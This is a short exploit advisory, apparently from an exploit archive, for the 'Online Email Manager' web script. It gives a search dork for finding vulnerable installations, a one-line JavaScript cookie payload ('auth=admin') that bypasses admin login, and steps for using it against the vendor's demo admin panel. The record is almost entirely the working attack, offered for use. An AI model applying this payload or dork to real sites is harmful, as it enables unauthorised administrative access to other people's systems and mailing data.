id: 5062
date: 04/16/2009
title: Online Email Manager Insecure Cookie Handling Vulnerability
author: Hussin X
cves: 

===========================================================
Online Email Manager Insecure Cookie Handling Vulnerability
===========================================================


Online Email Manager Insecure Cookie Handling Vulnerability


script : http://www.esoftpro.com/web_scripts_online_email_manager.phps
 
DorK   : Powered by Online Email Manager



exploit:

javascript:document.cookie = "auth=admin; path=/";



exploit for demo

|# http://www.esoftpro.com/demo/OEM/admin/index.php

|ex   javascript:document.cookie = "auth=admin; path=/";

|#  go to url "emailList.php"

|#  http://www.esoftpro.com/demo/OEM/admin/emailList.php

|# you login in to admin page :d



#  0day.today [2023-03-25]  #